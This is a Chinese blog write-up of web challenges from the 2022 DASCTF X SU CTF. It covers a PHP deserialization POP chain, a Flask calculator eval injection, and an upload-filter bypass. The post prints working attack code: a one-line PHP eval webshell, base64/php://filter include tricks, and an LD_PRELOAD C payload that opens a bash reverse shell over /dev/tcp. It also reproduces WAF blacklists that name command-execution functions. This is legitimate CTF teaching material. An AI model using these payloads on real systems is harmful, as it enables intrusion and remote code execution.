2022DASCTF X SU 三月春季挑战赛 Web部分 WriteUp

已于 2022-04-05 01:58:31 修改
阅读量4k 收藏
点赞数 1
文章标签: php web 安全 网络安全 python
于 2022-04-04 21:38:14 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51804748/article/details/123959693
版权

在这里插入图片描述

ezpop

<?php

class crow
{
    public $v1;
    public $v2;

    function eval() {
        echo new $this->v1($this->v2);
    }

    public function __invoke()
    {
        $this->v1->world();
    }
}

class fin
{
    public $f1;

    public function __destruct()
    {
        echo $this->f1 . '114514';
    }

    public function run()
    {
        ($this->f1)();
    }

    public function __call($a, $b)
    {
        echo $this->f1->get_flag();
    }

}

class what
{
    public $a;

    public function __toString()
    {
        $this->a->run();
        return 'hello';
    }
}
class mix
{
    public $m1;

    public function run()
    {
        ($this->m1)();
    }

    public function get_flag()
    {
        eval('#' . $this->m1);
    }
}

if (isset($_POST['cmd'])) {
    unserialize($_POST['cmd']);
} else {
    highlight_file(__FILE__);
}

一道常规的反序列题目,审计代码可以得到pop链为

fin::__destruct
↓↓↓
what::__toString
↓↓↓
mix::run
↓↓↓
crow::__invoke
↓↓↓
fin::__call
↓↓↓
mix::get_flag

对于eval('#' . $this->m1),可以用换行符\n绕过,构造如下

<?php

$Fin=new fin();
$fin2=new fin();
$what=new what();
$Mix=new mix();
$crow=new crow();
$fin=new fin();
$mix=new mix();

$mix->m1="\nsystem('find |xargs grep \"flag\"');";
$fin->f1=$mix;
$crow->v1=$fin;
$Mix->m1=$crow;
$what->a=$Mix;
$Fin->f1=$what;

$str=urlencode(serialize($Fin));
echo $str;
?>

在这里插入图片描述

calc

在这里插入图片描述
一道常规的计算器题目,要想办法rce,以下给出了源码

/app.py

#coding=utf-8
from flask import Flask,render_template,url_for,render_template_string,redirect,request,current_app,session,abort,send_from_directory
import random
from urllib import parse
import os
from werkzeug.utils import secure_filename
import time

app=Flask(__name__)

def waf(s):
    blacklist = ['import','(',')',' ','_','|',';','"','{','}','&','getattr','os','system','class','subclasses','mro','request','args','eval','if','subprocess','file','open','popen','builtins','compile','execfile','from_pyfile','config','local','self','item','getitem','getattribute','func_globals','__init__','join','__dict__']
    flag = True
    for no in blacklist:
        if no.lower() in s.lower():
            flag= False
            print(no)
            break
    return flag
    
@app.route("/")
def index():
    "欢迎来到SUctf2022"
    return render_template("index.html")

@app.route("/calc",methods=['GET'])
def calc():
    ip = request.remote_addr
    num = request.values.get("num")
    log = "echo {0} {1} {2}> ./tmp/log.txt".format(time.strftime("%Y%m%d-%H%M%S",time.localtime()),ip,num)
    
    if waf(num):
        try:
            data = eval(num)
            os.system(log)
        except:
            pass
        return str(data)
    else:
        return "waf!!"

if __name__ == "__main__":
    app.run(host='0.0.0.0',port=5000)

代码中waf(s)函数有很多的屏蔽词,但是没有屏蔽反引号,可以内联执行将反引号内命令的输出作为输入执行
构造payload并将回显反弹到服务器上
在这里插入图片描述

root@iZ2zec7mjp663ump9wsug3Z:~# nc -lvvp 6666
Listening on [0.0.0.0] (family 0, port 6666)
Connection from 117.21.200.166 36271 received!
20220404-132944 10.244.80.46 1+2#Th1s_is__F1114g bin boot dev etc home lib lib64 media mnt opt proc root run sbin srv sys tmp usr var

upgdstore

题目只让上传php文件,但是对文件内容有许多过滤,尝试传入一句话木马,发现$被过滤,那就先传一个phpinfo();看看
在这里插入图片描述
访问phpinfo后发现有成堆的disable_functions,只有少数几个函数可以使用
在这里插入图片描述
可以考虑使用show_source()读取index.php

<?php
show_source("index.php");

测试后发现show_source在黑名单种,于是可以使用base64进行绕过

<?php
base64_decode("c2hvd19zb3VyY2U=")("../index.php");

成功读取到源代码

<div class="light"><span class="glow">
<form enctype="multipart/form-data" method="post" onsubmit="return checkFile()">
    嘿伙计,传个火?!
    <input class="input_file" type="file" name="upload_file"/>
    <input class="button" type="submit" name="submit" value="upload"/>
</form>
</span><span class="flare"></span><div>

<?php
function fun($var): bool{
    $blacklist = ["\$_", "eval","copy" ,"assert","usort","include", "require", "$", "^", "~", "-", "%", "*","file","fopen","fwriter","fput","copy","curl","fread","fget","function_exists","dl","putenv","system","exec","shell_exec","passthru","proc_open","proc_close", "proc_get_status","checkdnsrr","getmxrr","getservbyname","getservbyport", "syslog","popen","show_source","highlight_file","`","chmod"];

    foreach($blacklist as $blackword){
        if(strstr($var, $blackword)) return True;
    }

    
    return False;
}
error_reporting(0);
//设置上传目录
define("UPLOAD_PATH", "./uploads");
$msg = "Upload Success!";
if (isset($_POST['submit'])) {
$temp_file = $_FILES['upload_file']['tmp_name'];
$file_name = $_FILES['upload_file']['name'];
$ext = pathinfo($file_name,PATHINFO_EXTENSION);
if(!preg_match("/php/i", strtolower($ext))){
die("只要好看的php");
}

$content = file_get_contents($temp_file);
if(fun($content)){
    die("诶,被我发现了吧");
}
$new_file_name = md5($file_name).".".$ext;
        $img_path = UPLOAD_PATH . '/' . $new_file_name;


        if (move_uploaded_file($temp_file, $img_path)){
            $is_upload = true;
        } else {
            $msg = 'Upload Failed!';
            die();
        }
        echo '<div style="color:#F00">'.$msg." Look here~ ".$img_path."</div>";
}

waf函数中使用的strstr()是对大小写敏感的,故可以用大小写绕过waf
可以先传入一个b64的一句话

<?php @eval($_POST['mac']);?>
f3b94e88bd1bd325af6f62828c8785dd.php

再上传一个php文件使用include来包含刚刚的一句话,利用伪协议对base64进行解码

php://filter/convert.base64-decode/resource=./f3b94e88bd1bd325af6f62828c8785dd.php

cGhwOi8vZmlsdGVyL2NvbnZlcnQuYmFzZTY0LWRlY29kZS9yZXNvdXJjZT0uL2YzYjk0ZTg4YmQxYmQzMjVhZjZmNjI4MjhjODc4NWRkLnBocA==

<?php
Include(base64_decode("cGhwOi8vZmlsdGVyL2NvbnZlcnQuYmFzZTY0LWRlY29kZS9yZXNvdXJjZT0uL2YzYjk0ZTg4YmQxYmQzMjVhZjZmNjI4MjhjODc4NWRkLnBocA=="));

在这里插入图片描述
成功getshell,但由于system()等函数被禁用,所以需要bypass disable_function
本来想试一试蚁剑的插件,但是这个shell怎么都连不上,非常奇怪

先构造恶意exp.c

#include <stdlib.h>
#include <stdio.h>
#include <string.h>
void payload() 
{
	system("bash -c 'exec bash -i &>/dev/tcp/ip/port <&1'");
}
int geteuid()
{ 
	if (getenv("LD_PRELOAD") == NULL) 
	{ 
		return 0; 
	} 
	unsetenv("LD_PRELOAD"); 
	payload();
}

编译成so文件

gcc exp.c -o exp.so -shared -fPIC

利用move_uploaded_file进行文件上传

move_uploaded_file($_FILES['upload_file']['tmp_name'],'www')

访问并反弹shell

mac=putenv("LD_PRELOAD=/var/www/html/uploads/aaaaa.so");mail("","","","","");
A丶R
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
2022-工大抗疫-web-writeup1
08-03
2022-工大抗疫-web-writeup1 本资源摘要信息聚焦于Web安全和网络协议相关知识点,涵盖了HTML、PHP、网络协议和Windows操作系统等多个方面。 一、网络协议 在Web开发中,网络协议扮演着重要角色。HTTP/1.1是目前最...
2022DASCTF X SU三月春季挑战赛 web复现
errorr0
04-20 1508
DASCTF
2022年3月buu月赛dasctf
weixin_51458899的博客
03-27 5992
2022年3月buu月赛dasctf web ezpop <?php class what { public $a; public function __construct(){ $this->a = new fin(); } } class mix{ public $m1; public function __construct(){ $this->m1 = "?><?=system('cat
2022DASCTF X SU 三月春季挑战赛 web复现
akxnxbshai的博客
06-12 997
2022DASCTF X SU 三月春季挑战赛复现一下。
2022DASCTF X SU 三月春季挑战赛web部分
qq_52988816的博客
03-28 817
简单写一下
记一道2021浙江省赛的Web
蚁景网安学院
11-02 2003
前景刚刚结束的浙江省网络安全大赛,其中Web类的第二题考察了POP链以及原生类的利用,在比赛期间只构造了POP链、得到flag的文件名,但是并没有利用原生类将flag文件完整读出来。这篇文...
Venom-2021-强网拟态防御国际精英挑战赛-WriteUp1
08-03
本篇WriteUp主要介绍了Venom-2021强网拟态防御国际精英挑战赛中的一个Web挑战题,涉及到Node.js、Express框架、JavaScript、Crypto库、Cookie会话等技术。下面我们将逐步解析挑战题的源代码,了解到挑战的设计思路和...
2024年第十七届全国大学生信息安全竞赛创新实践能力赛初赛部分Writeup
最新发布
05-27
2024年第十七届全国大学生信息安全竞赛创新实践能力赛初赛部分Writeup解析部分题目
2022HFCTF-线上赛官方Writeup1
08-04
随后读取了未知的 RSA 公钥 /etc/firmware.pub ,对第 8 字节开始的 128 字节进了公钥解密再然后 16 字节明 MD5。始有 zlib
MatchModels:2019中国高校计算机大赛-大数据挑战赛第15名WriteUp
03-10
2019中国高校计算机大赛-大数据挑战赛WriteUp 赛题: 我们是最终排名第15名的改革春风吹满地队伍,对方法和模型进行了简单的整理。 传统模型 查询和标题去重 训练词向量以及词频统计是query和title需做去重处理 图...
shell基础
weixin_45971087的博客
01-02 423
什么是shell??? 在Linux内核与用户之间的解释器程序 通常指/bin/bash 负责向内核翻译及传达用户/程序指令 相当于操作系统的"外壳" shell的使用方式 交互式 -----命令行 人工干预,智能化程度高,逐条解释执行,效率低. 非交互式 -----脚本 需要提前设计,智能化难度大.批量执行,效率高.方便在后台静悄悄的运行 常见的shell解释器 [root@pr...
PHP函数漏洞总结
柠檬木有枝
08-26 2612
前言 本文主要针对 PHP 函数相关的漏洞的总结,可能会偏向 CTF 方面,内容肯定不全,有空的话会持续更新,欢迎各位表哥补充以及对文章错误之处进行斧正! 1 弱类型安全问题 1.1 == 弱类型比较缺陷 === 在进行比较的时候,会先判断两种字符串的类型是否相等,再比较 == 在进行比较的时候,会先将字符串类型转化成相同,再比较 (1)字符串的开始部分决定了它的值,如果该字符串以合法的数值开始,则使用该数值,否则其值则为0 var_dump("admin"==0); //true var_dump("1a
2022DASCTF X SU 三月春季挑战赛 WriteUp
热门推荐
mumuzi的博客
03-27 1万+
因为这次团队协作较强,所以就把团队wp直接放了(这句话读不懂也没关系,总之放wp) 文章目录Misc月圆之夜 [mumuzi]什么奇奇怪怪的东西 [mumuzi]Hi!Hecker! [mumuzi,dota_st]问卷CryptoFlowerCipher [mumuzi,Lu1u]Reeasyre[Lu1u]IoTWhat's In The Bits[Lu1u,dota_st,mumuzi]Webezpop[atao]calc[atao]upgdstore(赛后)[atao] Misc 月圆之夜 [mu
[2022DASCTF]ezpop
m0_63045593的博客
04-22 1510
[2022DASCTF]ezpop <?php class crow { public $v1; public $v2; function eval() { echo new $this->v1($this->v2); } public function __invoke() { $this->v1->world(); } } class fin { public
2022DASCTF X SU 三月春季挑战赛
m0_56059226的博客
03-27 959
web ezpop <?php class crow { public $v1; public $v2; function eval() { echo new $this->v1($this->v2); } public function __invoke() { $this->v1->world(); } } class fin { public $f1; ..
[2022DASCTF X SU 三月春季挑战赛]calc
weixin_45751765的博客
04-09 2067
0x00 前言 比赛时几乎没看这道题 一方面ssti一直是短板 另一方面upgdstore感觉快出了就想搏一搏… 弥补一下 0x01 brain.md 很常规的计算器 很贴心给了源码 # coding=utf-8 from flask import Flask, render_template, url_for, render_template_string, redirect, request, current_app, session, \ abort, send_from_directory
BUU刷题Day10
姜小孩的博客
04-11 1920
[BSidesCF 2019]Kookie [极客大挑战 2019]RCE ME php_checkin flask 恐龙杯 BUU buu
python实现日志清理
qq_33877789的博客
01-22 6271
要求:1.日志文件夹中包含文件夹、日志(名称.年-月-日.log eg:localhost.2018-01-21.log)、其他格式非日志文件,如下: 实现清除3天前创建的日志文件,即删除日志文件中时间是三天前的文件 结果: 方法1: #通过time实现 import os,time def strToTimestamp(time_st,format='%Y%m%d%H%M%S
DASCTF三月
weixin_44687621的博客
04-10 3188
DASCTF2022.3部分题目 Web ezpop 题目源码如下 <?php class crow { public $v1; public $v2; function eval() { echo new $this->v1($this->v2); } public function __invoke() { $this->v1->world(); } } class fin {

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值